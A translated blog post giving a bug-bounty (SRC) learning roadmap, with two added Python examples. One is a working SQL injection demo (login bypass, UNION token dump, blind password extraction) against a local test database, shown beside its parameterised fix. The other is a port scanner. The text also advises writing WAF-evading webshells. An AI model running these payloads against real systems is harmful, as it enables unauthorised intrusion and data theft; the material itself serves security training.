SRC Vulnerability Mining: A Record of Going from Zero to One

Foreword

There is not yet a complete knowledge system for learning enterprise SRC vulnerability mining, so I will share my own experience here.

SRC vulnerability mining can be divided into the following seven stages:

  • Having a programming foundation in Python, PHP or a similar language
  • Mastering the principles and exploitation techniques of common vulnerabilities
  • Understanding SRC rules and vulnerability-hunting postures
  • Chaining vulnerabilities together and bypassing protections
  • Automated exploitation techniques
  • Having a circle of peers to hunt bugs with, exchange ideas and learn together
  • Continuously learning new knowledge

The questions you are most likely confused about right now are these:

  • I find plenty of vulnerabilities on public-welfare SRCs and EduSRC, but as soon as I move to enterprise SRC hunting I can't find anything!
  • I am a beginner; I have learned the vulnerability basics and have some programming foundation, but I don't know how to get started with enterprise SRCs.
  • Why do I find nothing after hunting for a long time, while the big names on the leaderboard still earn tens of thousands or even hundreds of thousands a month?
  • I'm curious what everyone else is finding, and how I should learn to do the same.

This article answers the questions above. If you have any questions, leave a comment or message me privately!


 

The first stage: have a programming foundation such as Python

Runoob tutorial for learning the syntax: https://www.runoob.com/python/python-tutorial.html

Python language basics in 50 lessons: https://github.com/jackfrued/Python-Core-50-Courses

Python 100 Days, from novice to master: https://github.com/jackfrued/Python-100-Days

The second stage: Master the principles and exploitation techniques of common vulnerabilities

The principles and exploitation techniques of common vulnerabilities can be learned in the following three phases; at a minimum, the first phase must be completed:
  • Phase 1: Web penetration
  • Phase 2: Website penetration
  • Phase 3: Intranet penetration

Learning route planning for each phase

Network security basics tutorial notes: https://mp.weixin.qq.com/s?__biz=MzkwNDI0MDc2Ng==&mid=2247483680&idx=1&sn=e1666c9a4a67f1222d90780a0ed619b8&chksm=c08b4a31f7fcc327deef435a30bfc550b33b5975f2bcc18dfb2ee20683da66025c68253a4c79&token=1423804057&lang=zh_CN#rd

Phase 1: Web penetration

Basic learning. Time: 1 to 2 weeks

  1. Understand the basic concepts (SQL injection, XSS, file upload, CSRF, one-sentence trojans, etc.; Google search will turn up material) to lay the foundation for the web penetration testing that follows.
  2. Read web penetration write-ups on forums and learn the thinking behind each case. Every site is different, so the way of thinking is what matters most.
  3. Learn the art of asking questions, and be willing to ask when you do not understand something.

Setting up the penetration environment. Time: 3 to 4 weeks

  1. Learn about the tools commonly used in penetration testing, such as AWVS, sqlmap, Nmap, Burp Suite, China Chopper, etc.
  2. Download backdoor-free versions of these tools and install them on your computer. Cracked copies circulated on forums frequently carry backdoors, so prefer official releases and verify the published hashes.
  3. Understand the usage scenarios and basic usage of these tools; searching on Google is recommended.

Hands-on penetration practice. Time: about 6 weeks

  1. Search for real penetration case studies online and gain an in-depth understanding of how SQL injection, file upload and parsing vulnerabilities are used in practice.
  2. Build your own vulnerable test environments; DVWA, SQLi-labs, Upload-labs and bWAPP are recommended.
  3. Understand the phases of a penetration test and what needs to be done in each, for example the PTES (Penetration Testing Execution Standard).
  4. Dig into manual SQL injection, find ways to bypass WAFs, and write your own scripts.
  5. Study the principles of file upload vulnerabilities: null-byte truncation, double-extension tricks (IIS, PHP), parsing vulnerabilities (IIS, Nginx, Apache), etc. Reference: upload attack framework.
  6. Understand the principles and types of XSS; practice in DVWA, use a CMS with known XSS vulnerabilities, and install Safedog or a similar WAF for testing.
  7. Learn about one-sentence trojans and try writing one that gets past Safedog.
  8. Research privilege escalation on Windows and Linux; Google keyword: privilege escalation.
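The manual SQL injection in item 4 above, worked through as an added example in Python (the language this roadmap recommends). This is not code from the original article; the SQLite schema, the two user accounts, the api_keys rows and every payload are constructed for illustration. login_vulnerable() builds its query by string formatting, the mistake DVWA and SQLi-labs exist to teach; login_safe() is the parameterised fix; blind_extract() is the boolean-based technique you end up scripting once error messages are hidden.

```python
"""Manual SQL injection, worked in a disposable SQLite database.

Added example, not code from the original article. Schema, rows and
payloads are constructed for illustration only.
"""
import sqlite3
import string

# Payload that comments out the password check entirely.
BYPASS_PAYLOAD = "admin' -- "
# Payload that turns the login query into a UNION over a second table.
UNION_PAYLOAD = "' UNION SELECT owner || ':' || token FROM api_keys -- "


def build_db() -> sqlite3.Connection:
    """Create an in-memory database with constructed users and API tokens."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE api_keys (id INTEGER PRIMARY KEY, owner TEXT, token TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "S3cretAdminPw!"), ("alice", "alice123")])
    conn.executemany("INSERT INTO api_keys (owner, token) VALUES (?, ?)",
                     [("admin", "tok-constructed-0001"), ("alice", "tok-constructed-0002")])
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """VULNERABLE: user input is pasted straight into the SQL text."""
    sql = (f"SELECT username FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    """FIXED: placeholders keep the input as data, never as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def blind_extract(conn: sqlite3.Connection, target_user: str, max_len: int = 64) -> str:
    """Boolean-based blind extraction: recover target_user's password one
    character at a time, using only whether the login query returned a row.
    The charset deliberately omits the single quote so every probe stays
    syntactically valid SQL."""
    charset = string.ascii_letters + string.digits + "!@#$%^&*_-"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            probe = f"{target_user}' AND SUBSTR(password, {pos}, 1) = '{ch}' -- "
            if login_vulnerable(conn, probe, "x"):
                recovered += ch
                break
        else:
            break  # no character matched: we ran past the end of the string
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("bypass :", login_vulnerable(db, BYPASS_PAYLOAD, "wrong"))
    print("union  :", login_vulnerable(db, UNION_PAYLOAD, "x"))
    print("blind  :", blind_extract(db, "admin"))
    print("fixed  :", login_safe(db, BYPASS_PAYLOAD, "wrong"))
```

Run it directly to see the three attacks and the fixed function side by side. The same probes carry over to a real target once login_vulnerable() is replaced by an HTTP request and you decide what "returned a row" looks like in the response (a welcome page versus an error); that oracle is exactly what sqlmap automates and what a WAF tries to break by filtering the quote, the comment marker or the SUBSTR keyword.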

Frequently visit network-security websites. Time: ∞

  1. For example: FreeBuf, iChunqiu, Anquanke, security-related WeChat official accounts, and Google search.
  2. When you come across a worthwhile article, repost it to your own blog.

Getting familiar with Windows and Kali Linux. Time: 2 to 4 weeks

  1. Know the common Windows commands, such as ipconfig, nslookup, tracert, net, tasklist, taskkill, etc.
  2. Know the common Linux commands, such as wget, mv, cd, rm, mkdir, etc.
  3. Become familiar with the common tools shipped with Kali Linux.

Learning server security configuration. Time: about 4 weeks

  1. Understand the basic IIS configuration on Windows Server 2003, 2008 and 2012, understand directory permissions on Windows (such as IIS write permissions), and build a simple site.
  2. Learn about Linux run permissions, directory traversal and folder permissions; learn to configure a Linux web server and build a simple site.
  3. Scan the sites you built with automated tools and use Google to learn how to fix the vulnerabilities they report.
  4. Learn to apply patches, restrict ports with iptables, add firewall rules, etc.
  5. Download a WAF and become familiar with using it.

Learning some programming. Time: about 8 weeks

  1. Learn the basics of HTML, PHP and databases on w3cschool; working through the eighth section of each is recommended.
  2. Learn Python (other languages are fine too, but Python is highly recommended). What to cover: crawlers (basic), multithreading, file operations, regular expressions (basic) and some commonly used third-party libraries; you may need to install pip.
  3. Use Python to write a simple PoC or exploit.
  4. Develop some programs you will use during penetration, such as a port scanner.
  5. Pick one PHP framework to learn, but don't go too deep.
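Item 4 above asks for a port scanner of your own. What follows is an added example, not code from the original article: a multithreaded TCP connect scanner with banner grabbing in Python, which also exercises the sockets, threading and regular-expression topics from item 2. To keep it runnable offline, demo() starts a throwaway listener on 127.0.0.1 that answers with a constructed SSH-style banner; every host, port and banner string here is an assumption for illustration.

```python
"""Multithreaded TCP connect scanner with banner grabbing.

Added example, not code from the original article. Hosts, ports and
banners are constructed for illustration; demo() supplies its own target.
"""
import re
import socket
import threading
from concurrent.futures import ThreadPoolExecutor
from typing import Dict, Iterable, Optional, Tuple

# Simple banner fingerprints; the first matching pattern names the service.
SERVICE_HINTS = [
    (re.compile(rb"^SSH-\d"), "ssh"),
    (re.compile(rb"^HTTP/\d\.\d"), "http"),
    (re.compile(rb"^220[ -]"), "ftp/smtp"),
    (re.compile(rb"^\+OK"), "pop3"),
    (re.compile(rb"^\* OK"), "imap"),
]


def guess_service(banner: bytes) -> str:
    """Map the first bytes a service sends (or answers with) to a name."""
    for pattern, name in SERVICE_HINTS:
        if pattern.match(banner):
            return name
    return "unknown"


def probe_port(host: str, port: int, timeout: float = 0.5) -> Optional[Tuple[int, bytes]]:
    """TCP connect to host:port. Returns (port, banner) when open, None when
    closed or filtered. A service that waits for the client to speak first
    (HTTP does) gets a bare HEAD request as a nudge."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.settimeout(timeout)
            try:
                banner = sock.recv(256)
            except socket.timeout:
                try:
                    sock.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
                    banner = sock.recv(256)
                except (socket.timeout, OSError):
                    banner = b""
            except OSError:
                banner = b""
    except OSError:
        return None  # refused, unreachable or timed out
    return port, banner


def scan_ports(host: str, ports: Iterable[int], timeout: float = 0.5,
               workers: int = 64) -> Dict[int, Tuple[bytes, str]]:
    """Scan ports concurrently; returns {port: (banner, service_guess)}."""
    results: Dict[int, Tuple[bytes, str]] = {}
    with ThreadPoolExecutor(max_workers=workers) as pool:
        for hit in pool.map(lambda p: probe_port(host, p, timeout), ports):
            if hit is not None:
                port, banner = hit
                results[port] = (banner, guess_service(banner))
    return results


def _serve_banner(listener: socket.socket, banner: bytes, stop: threading.Event) -> None:
    """Tiny fake service for the demo: send a banner to each client, then hang up."""
    listener.settimeout(0.2)
    while not stop.is_set():
        try:
            conn, _ = listener.accept()
        except socket.timeout:
            continue
        with conn:
            try:
                conn.sendall(banner)
            except OSError:
                pass


def demo() -> Tuple[int, Dict[int, Tuple[bytes, str]]]:
    """Start a constructed SSH-like listener on an ephemeral loopback port and
    scan a small window of ports around it. Returns (listener_port, findings)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(16)
    port = listener.getsockname()[1]
    stop = threading.Event()
    server = threading.Thread(target=_serve_banner,
                              args=(listener, b"SSH-2.0-constructed_demo\r\n", stop),
                              daemon=True)
    server.start()
    try:
        findings = scan_ports("127.0.0.1", range(port - 3, port + 4), timeout=1.0)
    finally:
        stop.set()
        server.join()
        listener.close()
    return port, findings


if __name__ == "__main__":
    listener_port, hits = demo()
    for p, (banner, service) in sorted(hits.items()):
        print(f"{p:5d}/tcp open  {service:9s} {banner!r}")
```

Against a real host, replace the demo() call with scan_ports(target, range(1, 1025)); the thread pool bounds the number of simultaneous connects, and the per-connection timeout is what distinguishes a filtered port (slow) from a refused one (instant). Keep the point-2 regex habit in mind: the fingerprint table is where you grow the scanner as you meet new services.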

Learning code auditing. Time: 4 to 6 weeks

  1. Learn static and dynamic code-auditing methods and understand how to analyze a program.
  2. Find open-source vulnerable programs in the WooYun mirror, follow the analysis method you learned, and try analyzing the code yourself 3 to 5 times.
  3. Understand the root causes of web vulnerabilities and be familiar with the commonly dangerous functions.

Building your own security system. Time: ∞

  1. Develop some security tools and open-source them; host them on Gitee (Code Cloud) or GitHub to demonstrate your ability.
  2. Establish your own security knowledge system with an independent way of thinking.

Phase 2: Website penetration

You can learn from Liangshen's sharing, the Micro8 series: https://github.com/Micropoor/Micro8

Phase 3: Intranet penetration

Self-study route guide for intranet penetration

No.1 Basics

https://daiker.gitbook.io/windows-protocol/ [Windows authentication knowledge]

https://github.com/l3m0n/pentest_study [Domain environment setup, port forwarding and related knowledge]

https://xz.aliyun.com/t/6349 [Port forwarding, mapping and proxying for intranet penetration]

https://gorgias.me/2018/04/04/Data forwarding skills in penetration/ [Building SSH, ICMP, DNS and other tunnels]

No.2 Intermediate

https://github.com/Paper-Pen/GatherInfo [Intranet information gathering]

https://www.anquanke.com/post/id/92646 [Domain penetration]

http://rinige.com/index.php/archives/625/ [Host positioning techniques for intranet information gathering]

http://dwz.date/x47 [Lateral movement]

https://www.secshi.com/21502.html [Workgroup penetration]

No.3 Advanced

https://xz.aliyun.com/t/2354 [Intranet security assessment and penetration summary]

https://lab.pentestit.ru/ [Foreign intranet practice lab]

http://vulnstack.qiyuanxuetang.net/vuln/ [Domestic intranet practice lab (by Hongri Security)]

https://github.com/PowerShellMafia/PowerSploit [PowerShell framework; it is best to learn some PowerShell syntax yourself]

https://github.com/Ridter/Intranet_Penetration_Tips [Intranet penetration tips]

 

The third stage: Understanding SRC rules and vulnerability-hunting postures

3.1 Understanding SRC rules

Learn directly from the SRC's own announcements; here a particular SRC's announcement is used as the example.

3.1.1 Understand the red lines of SRC vulnerability hunting

Never cross the red lines: do not break the law or the program rules, and be a law-abiding citizen. In practice that means testing only assets inside the published scope, stopping at proof of the vulnerability rather than reading, downloading or keeping data you reach, never disrupting the service, and removing anything you left behind.

3.1.2 Understand the scope of SRC vulnerability collection

3.1.3 Understand SRC vulnerability ratings

 

3.2 Learning vulnerability-hunting postures and skills

You can watch Teacher Wanli's logic-vulnerability hunting skills on Bilibili: https://www.bilibili.com/video/BV1uc411H7Pd/?spm_id_from=333.337.search-card.all.click

The fourth stage: Automated exploitation skills

Once you are familiar with manual vulnerability hunting, you need to improve your efficiency, and at that point a programming foundation becomes essential. Early on, learn the open-source automation plug-ins and tools that experienced hunters have released; later, try writing your own Burp Suite plug-ins. Start with plug-ins to build up your own automated vulnerability hunting.

The fifth stage: Have a circle of peers to hunt bugs with, exchange ideas and learn together

As everyone knows, SRC vulnerability-hunting techniques keep advancing. At the same time, hunting on your own makes it easy to slack off. If you have friends and a circle to hunt with, you will make progress together and share experiences with each other.

The sixth stage: Keep learning new knowledge

Visit communities, blogs and similar places more often to keep learning.


Source: https://blog.csdn.net/Hacker0830/article/details/129859948